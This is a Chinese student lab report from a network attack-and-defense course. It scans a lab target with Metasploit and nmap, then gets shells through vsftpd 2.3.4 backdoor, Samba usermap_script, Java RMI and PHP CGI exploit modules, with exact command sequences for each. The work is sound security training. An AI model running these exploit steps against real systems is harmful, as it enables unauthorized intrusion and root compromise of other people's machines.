首页 > 其他分享 >20222404 2024-2025-1 《网络与系统攻防技术》实验六实验报告

20222404 2024-2025-1 《网络与系统攻防技术》实验六实验报告

时间:2024-11-18 14:09:35浏览次数:1  
标签:set 漏洞 端口 192.168 2024 2025 exploit 20222404 靶机

1.实验内容
1.1实验要求
掌握metasploit的用法。
(1)前期渗透
①主机发现(可用Aux中的arp_sweep,search一下就可以use)
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③选做:也可以扫系统版本、漏洞等。
(2)Vsftpd源码包后门漏洞(21端口)

1.2本周学习内容
说实话印象最深的就是周五的相关测试orz……
主要学习了Metasploit工具。包括其作为模块化系统载荷模块、扫描模块、辅助模块等,也对其命令包括set\usee等进行了了解,并在实验中进一步通过实践体会。

2.实验过程
2.1前期渗透
靶机中获取地址:

在kali中打开msfconsole,进行扫描搜索。
search arp_sweep
use 0
set RHOSTS 192.168.47.0/24
run

扫描到了靶机。
nmap -p 1-2048 192.168.47.146查看靶机开放的端口。

其中开放端口会在后续操作的攻击过程中用到。
再使用nmap -script=vuln对靶机进行漏洞扫描。可见存在大量问题和漏洞。

21端口,有Vsftpd源码包后门漏洞


2.2Vsftpd源码包后门漏洞(21端口)
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.47.146
run
再输入uname -a,pwd,id等命令,可以看到已经获取靶机的shell,攻击成功

2.3SambaMS-RPC Shell命令注入漏洞(端口139)
use exploit/multi/samba/usermap_script
set RHOST 192.168.47.146
exploit
再输入uname -a命令,获取靶机的shell,攻击成功。

2.4Java RMI SERVER命令执行漏洞(1099端口)
use exploit/multi/misc/java_rmi_server
set RHOST 192.168.47.146
exploit
shell
输入命令whoami,得到结果root,攻击成功。

2.5PHP CGI参数执行注入漏洞(80端口)
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.47.146
exploit
shell
可以执行命令,说明攻击成功。

3.问题及解决方案

4.学习感悟与思考
本次实验相较于周五的测试简单了太多,可能是因为靶机环境是已经设置好不需要格外操作的,做周五测试时是真的痛苦,所有的靶机环境都有问题,和输入命令入关,只能不停地调试靶机。
总之有了对比,本次实验较为轻松,也算进一步对msf进行了解和实际操作。同时结合msf和nmap对问题进行搜集也让人印象深刻。
本次实验我体会到了电脑漏洞的可怕,明白了网络安全达到重要性。

标签:set,漏洞,端口,192.168,2024,2025,exploit,20222404,靶机
From: https://www.cnblogs.com/ancest06/p/18552497

相关文章

  • 数据结构实验三 2024_树与图实验
    数据结构实验三2024_树与图实验7-1根据后序和中序遍历输出前序遍历本题要求根据给定的一棵二叉树的后序遍历和中序遍历结果,输出该树的前序遍历结果。输入格式:第一行给出正整数n(≤30),是树中结点的个数。随后两行,每行给出n个整数,分别对应后序遍历和中序遍历结果,数字间以......
  • Z-Library最新可用官方网址及镜像入口【2024持续更新】
    Z-Library是一家电子图书馆,被誉为全球最大的科学图书和学术文献免费资源之一。它创办于2009年,截至2022年10月1日,已收录超过1129万本图书和8483万篇学术文章。从各种知名文学著作,理工学科,人文艺术、到学术论文等应有尽有!支持PDF、epub、mobi等多种格式图书资源下载绝对是你找书......
  • 内衣洗衣机的十大排行:2024年十大强悍内衣洗衣机汇总
    平时我们在日常生活中衣服免不了沾上各种细菌、毛发和污渍,如果把这些衣服和贴身衣物混洗就会比较容易出现交叉感染,而受感染后贴身衣物有可能造成人体患上皮肤病。为此,所以很多人都会选择单独手洗贴身衣物,但其实手洗很容易出现清洁不干净的问题,这时候内衣洗衣机就能很好解决这个......
  • 图论入门书籍(2024.11.16)
    1、我的第一本算法书(2018年11月)2、程序员的数学4:图论入门(图灵出品)3、图论入门[Graphs:AnIntroduction](2022.09)4、啊哈!算法5、趣味的图论问题6、动画算法与数据结构(图灵出品)-2024.037、图论一个迷人的世界(2022.09)8、现代图论9、图论算法理......
  • NOIP 模拟赛:2024-11-16
    全体栽在T1?T1:二分一下内存大小然后模拟判断。关键点在于意识到"解码"和"播放"这两种事件是分开的。用一个while循环,每次循环从"完成某帧的解码"、"开始某帧的解码"、"播放某帧"、"删除某帧"之间选时间最早的时间执行。T2:板题,并查集额外记录个vector然后启发式合......
  • 【2024-11-15】坚持早睡
    20:00学会和无能共处的人能学习到很多东西。它会引领我们重视最渺小的东西,知道自己的局限,这些都是更高的要求。                                                 ——荣......
  • 【2024-11-17】连岳摘抄
    23:59我们与其说身体是我们的生命,不如说我们的一切“活动”与“行为’”才是我们的生命。                                                 ——钱人生很不容易,也很......
  • 2024年阿里云双11年度大促:云服务器低至1折起
    2024年阿里云双11年度大促:云服务器低至1折起,要参与2024年阿里云双十一活动,您可以按照以下步骤进行:一、前期准备注册/登录阿里云账号访问阿里云官网,根据页面提示完成账号注册或登录。了解活动信息在阿里云官网的活动页面或相关公告中,了解双十一活动的具体信息,包括活动时间......
  • 2024年腾讯云双11云服务器大促详解,优惠享不停
    一、2024年腾讯云双十一活动时间腾讯云双十一活动将于即日起至2024年11月30日,活动时间跨度很长,让用户有足够的时间选购自己所需的云产品和服务。具体以页面变更为准。二、2024年腾讯云双十一活动入口腾讯云双11活动:【点此直达】了解。​​三、2024年腾讯云双十一活动内容......
  • 2024年腾讯云双十一活动:腾讯云11.11上云拼团Go活动详细说明
    一、2024年腾讯云双十一活动时间腾讯云双十一活动将于即日起至2024年11月30日,活动时间跨度很长,让用户有足够的时间选购自己所需的云产品和服务。具体以页面变更为准。二、2024年腾讯云双十一活动入口腾讯云双11活动入口:【点此直达】了解。​三、2024年腾讯云双十一活动......